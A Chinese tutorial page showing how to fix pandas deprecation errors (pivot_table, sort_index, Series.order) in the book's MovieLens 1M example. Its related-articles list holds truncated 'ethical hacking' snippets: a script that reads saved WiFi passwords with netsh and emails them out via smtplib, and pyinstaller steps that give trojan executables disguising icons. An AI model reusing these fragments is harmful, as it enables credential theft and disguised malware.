首页 / PYTHON / PythonForDataAnalysis学习之路

PythonForDataAnalysis学习之路

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了PythonForDataAnalysis学习之路，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含5491字，纯文字阅读大概需要8分钟。

内容图文

在引言章节里，介绍了MovieLens 1M数据集的处理示例。书中介绍该数据集来自GroupLens Research（）,该地址会直接跳转到，这里面提供了来自MovieLens网站的各种评估数据集，可以下载相应的压缩包，我们需要的MovieLens 1M数据集也在里面。

PythonForDataAnalysis学习之路 - 文章图片

下载解压后的文件夹如下：

PythonForDataAnalysis学习之路 - 文章图片

这三个dat表都会在示例中用到。我所阅读的《Python For Data Analysis》中文版（PDF）是2014年第一版的，里面所有示例都是基于Python 2.7和pandas 0.8.2所写的，而我安装的是Python 3.5.2与pandas 0.20.2，里面的一些函数与方法会有较大的不同，有些是新版本中参数改变了，而有些是新版本里弃用了某些旧版本的函数，这导致我运行按照书中示例代码时，会遇到一些Error和Warning。在测试MovieLens 1M数据集代码时，在和一样我的配置环境下，会遇到如下几个问题。

在将dat数据读入到pandas DataFrame对象中时，书中给出代码为：

users = pd.read_table('ml-1m/users.dat', sep='::', header=None, names=unames)

rnames = ['user_id', 'movie_id', 'rating', 'timestamp']
ratings = pd.read_table('ml-1m/ratings.dat', sep='::', header=None, names=rnames)

mnames = ['movie_id', 'title', 'genres']
movies = pd.read_table('ml-1m/movies.dat', sep='::', header=None, names=mnames)

直接运行会出现Warning:

F:/python/HelloWorld/DataAnalysisByPython-1.py:4: ParserWarning: Falling back to the 'python' engine because the 'c' engine does not support regex separators (separators > 1 char and different from '\s+' are interpreted as regex); you can avoid this warning by specifying engine='python'.
  users = pd.read_table('ml-1m/users.dat', sep='::', header=None, names=unames)
F:/python/HelloWorld/DataAnalysisByPython-1.py:7: ParserWarning: Falling back to the 'python' engine because the 'c' engine does not support regex separators (separators > 1 char and different from '\s+' are interpreted as regex); you can avoid this warning by specifying engine='python'.
  ratings = pd.read_table('ml-1m/ratings.dat', sep='::', header=None, names=rnames)
F:/python/HelloWorld/DataAnalysisByPython-1.py:10: ParserWarning: Falling back to the 'python' engine because the 'c' engine does not support regex separators (separators > 1 char and different from '\s+' are interpreted as regex); you can avoid this warning by specifying engine='python'.
  movies = pd.read_table('ml-1m/movies.dat', sep='::', header=None, names=mnames)

虽然也能运行，但是作为完美强迫症的我还是想要解决这个Warning。这个警告是说因为'C'引擎不支持，只能退回到'Python'引擎，而刚好pandas.read_table方法里有个engine参数，用来设置使用哪种解析引擎，有'C'和'Python'这两个选项。既然'C'引擎不支持，我们只需把engine设为'Python'就可以了。

users = pd.read_table('ml-1m/users.dat', sep='::', header=None, names=unames, engine = 'python')

rnames = ['user_id', 'movie_id', 'rating', 'timestamp']
ratings = pd.read_table('ml-1m/ratings.dat', sep='::', header=None, names=rnames, engine = 'python')

mnames = ['movie_id', 'title', 'genres']
movies = pd.read_table('ml-1m/movies.dat', sep='::', header=None, names=mnames, engine = 'python')

使用pivot_table方法来对聚合后的数据按性别计算每部电影的平均得分，书中给出的代码为：
```
mean_ratings = data.pivot_table('rating', rows='title', cols='gender', aggfunc='mean')
```
直接运行会报错，这段代码无法运行：
```
Traceback (most recent call last):
  File "F:/python/HelloWorld/DataAnalysisByPython-1.py", line 19, in <module>mean_ratings = data.pivot_table('rating', rows='title', cols='gender', aggfunc='mean')
TypeError: pivot_table() got an unexpected keyword argument 'rows'
```
TypeError说明这里的'rows'参数并不是方法里可用的关键字参数，这是这么回事呢？去官网上查了下pandas的API使用文档（），发现是因为0.20.2版的pandas.pivot_table里关键字参数变了，为了实现同样效果，只需把rows换成index就可以了，同时也没有cols参数，要用columns来代替。
```
mean_ratings = data.pivot_table('rating', index='title', columns='gender', aggfunc='mean')
```
为了了解女性观众最喜欢的电影，使用DataFrame的方法对F列进行降序排序，书中的示例代码为：
```
top_female_ratings = mean_ratings.sort_index(by='F', ascending=False)
```
这里也只是给出一个Warning，并不会干扰程序进行：
```
F:/python/HelloWorld/DataAnalysisByPython-1.py:32: FutureWarning: by argument to sort_index is deprecated, pls use .sort_values(by=...)
  top_female_ratings = mean_ratings.sort_index(by='F', ascending=False)
```
这里是说进行排序的sort_index方法在将来语言或者库中可能发生改变，建议改为使用sort_values。在API使用文档中，对pandas.DataFrame.sort_index的描述为“Sort object by labels (along an axis)”，而对pandas.DataFrame.sort_values的描述为“Sort by the values along either axis”，两者能达到同样效果，那我就直接替换成sort_values就可以了。在后面的“计算评分分歧”中也会用到sort_index，也可以替换成sort_values。
```
top_female_ratings = mean_ratings.sort_values(by='F', ascending=False)
```
最后一个错误还是和排序有关。在“计算评分分歧”中计算得分数据的标准差之后，根据过滤后的值对Series进行降序排序，书中的代码为：
```
print(rating_std_by_title.order(ascending=False)[:10])
```
这里的错误是：
```
Traceback (most recent call last):
  File "F:/python/HelloWorld/DataAnalysisByPython-1.py", line 47, in <module>print(rating_std_by_title.order(ascending=False)[:10])
  File "E:\Program Files\Python35\lib\site-packages\pandas\core\generic.py", line 2970, in __getattr__return object.__getattribute__(self, name)
AttributeError: 'Series' object has no attribute 'order'
```
居然已经没有这个order的方法了，只好去API文档中找替代的方法用。有两个，sort_index和sort_values，这和DataFrame中的方法一样，为了保险起见，我选择使用sort_values：
```
print(rating_std_by_title.sort_values(ascending=False)[:10]
```
得到的结果和数据展示的结果一样，可以放心使用。

第三方库不同版本间的差异还是挺明显的，建议是使用最新的版本，在使用时配合官网网站上的API使用文档，轻松解决各类问题~

以上就是Python For Data Analysis学习之路的详细内容，更多请关注Gxl网其它相关文章！

内容总结

以上是互联网集市为您收集整理的PythonForDataAnalysis学习之路全部内容，希望文章能够帮你解决PythonForDataAnalysis学习之路所遇到的程序开发问题。如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端

扫描二维码推送至手机访问。

本文链接：https://qyyshop.com/info/427302.html

来源：【匿名】

【上一篇】Python开发之进程与线程概述【下一篇】浅谈PHP运行Python脚本的方法

更多 ►

【PythonForDataAnalysis学习之路】教程文章相关的互联网学习教程文章

Applied Social Network Analysis in Python 相关笔记【图】

原文：https://www.cnblogs.com/shadow1/p/10887081.html

Python Ethical Hacking - TROJANS Analysis(4)【代码】【图】

Adding Icons to Generated ExecutablesPrepare a proper icon file.https://www.iconfinder.com/ Convert the downloaded png file to an icon file.https://www.easyicon.net/language.en/covert/ Convert the Python program to Windows executable - adding the "--icon" arguments this time.wine /root/.wine/drive_c/Program\ Files\ \(x86\)/Python37-32/Scripts/pyinstaller.exe --add-data "/root/Downloads/sample...

Python Reference in Data Analysis / Mining Tools

If you are already familiar with the module/package loading methods of Python, the following table is relatively easy to find.Python is referenced in the following table as a module. Some modules are not native modules. Please use pip install * to install;Mechine LearningCategorySubcategoryPythonLDA sklearn.discriminant_analysis.LinearDiscriminantAnalysisQDA sklearn.discriminant_analysis.Quadratic...

Python For Data Analysis -- NumPy【图】

NumPy作为python科学计算的基础，为何python适合进行数学计算，除了简单易懂，容易学习Python可以简单的调用大量的用c和fortran编写的legacy的库 The NumPy ndarray: A Multidimensional Array Objectndarray，可以理解为n维数组，用于抽象矩阵和向量Creating ndarrays最简单的就是，从list初始化，当然还有其他的方式，比如，汇总， Data Types for ndarrays首先对于ndarray只能存放同一类型数据，并且由于封装了c和fortran的库，...

PythonForDataAnalysis学习之路【图】

在引言章节里，介绍了MovieLens 1M数据集的处理示例。书中介绍该数据集来自GroupLens Research（）,该地址会直接跳转到，这里面提供了来自MovieLens网站的各种评估数据集，可以下载相应的压缩包，我们需要的MovieLens 1M数据集也在里面。下载解压后的文件夹如下：这三个dat表都会在示例中用到。我所阅读的《Python For Data Analysis》中文版（PDF）是2014年第一版的，里面所有示例都是基于Python 2.7和pandas 0.8.2所写的，而我安...

如何在短时间内快速入门SocialNetworkAnalysis？【图】

有哪些教材可以推荐？又应该从哪一种分析软件入手？回复内容：首先社会网络分析有两种路线，一种偏文科的，偏社会学，就是讲究在一定量化基础上定性分析，解释一些社会现象，另外一种是偏理科的，往往需要大量数据点，然后从数学上对拓扑结构进行定量分析和判断，或者会利用到网络上的社交网络（Online Social Networks）进行大规模的计算。如果是软件党，一般就是第一种了，把网络扔进软件算算指标什么的。软件推荐Gephi，这个可...

NumpyAPIAnalysis

histogram >>> a = numpy.arange(5)>>> hist, bin_edges = numpy.histogram(a,density=False)>>> hist, bin_edges(array([1, 0, 1, 0, 0, 1, 0, 1, 0, 1], dtype=int64), array([ 0. , 0.4, 0.8, 1.2, 1.6, 2. , 2.4, 2.8, 3.2, 3.6, 4. ])) Analysis:Variable a is [0 1 2 3 4]After call histogram, it will calculate the total count each number in a= [0 1 2 3 4] according to each bins(阈值), for example:bi...

python3.6+torch1.2实现Sentiment Analysis（数据集MR）【代码】【图】

总共是下面几个文件：注意，最后一个是json文件，里面是电影影评数据集MR的划分出来的训练集生成的词典。是个字典文件，也可以自己再弄一个。在训练集上训练了10个epoch，结果大概是上图这个样子 1、创建model_para.py文件，里面是模型的超参数。 import argparseclass Hpara():parser = argparse.ArgumentParser() ############# insert paras #############parser.add_argument('--batch_size',default = 16, type = int)...

Python Ethical Hacking - TROJANS Analysis(4)【代码】【图】

Adding Icons to Generated Executables Prepare a proper icon file. https://www.iconfinder.com/ Convert the downloaded png file to an icon file. https://www.easyicon.net/language.en/covert/ Convert the Python program to Windows executable - adding the "--icon" arguments this time.wine /root/.wine/drive_c/Program\ Files\ \(x86\)/Python37-32/Scripts/pyinstaller.exe --add-data "/root/Downloa...

Python Ethical Hacking - Malware Analysis(3)【代码】【图】

Stealing WiFi Password Saved on a Computer#!/usr/bin/env pythonimport smtplib import subprocess import redef send_mail(email, password, message):server = smtplib.SMTP("smtp.gmail.com", 587)server.starttls()server.login(email, password)server.sendmail(email, email, message)server.quit()command = "netsh wlan show profile" networks = subprocess.check_output(command, shell=True) network_names_list = r...

[Python For Data Analysis] Numpy Basics

创建数组 import numpy as np# np.array 将一个iterable object转换为 ndarray data2 = [[2, 3, 4], [5, 6, 7]] arr2 = np.array(data2, dtype = np.float64) #[[2. 3. 4.] # [5. 6. 7.]]arr3 = np.array(data2, dtype = np.int32) #[[2 3 4] # [5 6 7]]# astype 方式将一种数据类型的array转换为另一个类型的array float32_arr = arr2.astype(np.float32)numeric_strings = np.array(['1.23', '-9.6', '43.4'], dtype=np.string_)...

如何使用Python(scikit-learn)计算FactorAnalysis得分？【代码】

我需要进行探索性因子分析,并使用Python计算每个观察的分数,假设只有1个潜在因素.似乎sklearn.decomposition.FactorAnalysis()是要走的路,但遗憾的是documentation和example(遗憾的是我无法找到其他例子)对我来说还不够清楚如何完成工作. 我有以下测试文件,包含29个29变量的观察结果(test.csv)：49.6,34917,24325.4,305,101350,98678,254.8,276.9,47.5,1,3,5.6,3.59,11.9,0,97.5,97.6,8,10,100,0,0,96.93,610.1,100,1718.22,6.7,28...

Applied-Social-Network-Analysis-in-Python 相关笔记4【图】

模型数据越多，Average系数就越小。 perferential attachment model 有比较小的平均路径长度，但有着小的cc。rewire:重新连接如果仅看这个共同的邻居数的话，数量一样的话，评判不出来。

吴裕雄 python 机器学习——线性判断分析LinearDiscriminantAnalysis【代码】【图】

import numpy as np import matplotlib.pyplot as pltfrom matplotlib import cm from mpl_toolkits.mplot3d import Axes3D from sklearn.model_selection import train_test_split from sklearn import datasets, linear_model,discriminant_analysisdef load_data():# 使用 scikit-learn 自带的 iris 数据集iris=datasets.load_iris()X_train=iris.datay_train=iris.targetreturn train_test_split(X_train, y_train,test_size=0...

01Design and Analysis Algorithm Using Python-程振波【代码】【图】

1.(p14)比较两个数的大小a = int(input(num:)) b = int(input(num:)) def getMax(a,b):if a>b :print(The bigger number is a:)else:print(The bigger number is b:) getMax(a,b)Compare 2.

PYTHON - 技术教程分类

Python3 教程 Python3 简介 Python3 环境搭建 Python3 基础语法 Python3 基本数据类型 Python3 解释器 Python3 注释 Python3 运算符 Python3 数字(Number) Python3 字符串 Python3 列表 Python3 元组 Python3 字典 Python3 集合 Python3 编程第一步 Python3 条件控制 Python3 循环语句 Python3 迭代器与生成器 Python3 函数 Python3 数据结构 Python3 模块 Python3 输入和输出 Python3 File Python3 OS Python3 错误和异常 Python3 面向对象 Python3 命名空间/作用域 Python3 标准库概览 Python3 实例 Python3 CGI编程 Python3 MySQL(PyMySQL) Python3 网络编程 Python3 SMTP发送邮件 Python3 多线程 Python3 日期和时间 Python3 内置函数 Python3 MongoDB Python3 urllib python 全部

PYTHON - 最热教程

python如何统计字符串中字母个数？使用Python进行微信公众号开发（三）回...Python+PyQT5的子线程更新UI界面的实例 python时间戳怎么获得？如何获得当前时...vscode调试python时提示无法将“conda”...python接口自动化全局变量access_token...python收取邮件(腾讯企业邮箱)python如何绘制降水图详解python并发获取snmp信息及性能测试...怎么卸载Python3.6？

首页 / PYTHON / PythonForDataAnalysis学习之路

PythonForDataAnalysis学习之路

内容导读

内容图文

内容总结

内容备注

内容手机端

【PythonForDataAnalysis学习之路】教程文章相关的互联网学习教程文章

Applied Social Network Analysis in Python 相关笔记【图】

Python Ethical Hacking - TROJANS Analysis(4)【代码】【图】

Python Reference in Data Analysis / Mining Tools

Python For Data Analysis -- NumPy【图】

PythonForDataAnalysis学习之路【图】

如何在短时间内快速入门SocialNetworkAnalysis？【图】

NumpyAPIAnalysis

python3.6+torch1.2实现Sentiment Analysis（数据集MR）【代码】【图】

Python Ethical Hacking - TROJANS Analysis(4)【代码】【图】

Python Ethical Hacking - Malware Analysis(3)【代码】【图】

[Python For Data Analysis] Numpy Basics

如何使用Python(scikit-learn)计算FactorAnalysis得分？【代码】

Applied-Social-Network-Analysis-in-Python 相关笔记4【图】

吴裕雄 python 机器学习——线性判断分析LinearDiscriminantAnalysis【代码】【图】

01Design and Analysis Algorithm Using Python-程振波【代码】【图】

PYTHON - 相关标签

DATA - 相关标签

PYTHON - 技术教程分类

PYTHON - 最新教程

PYTHON - 最热教程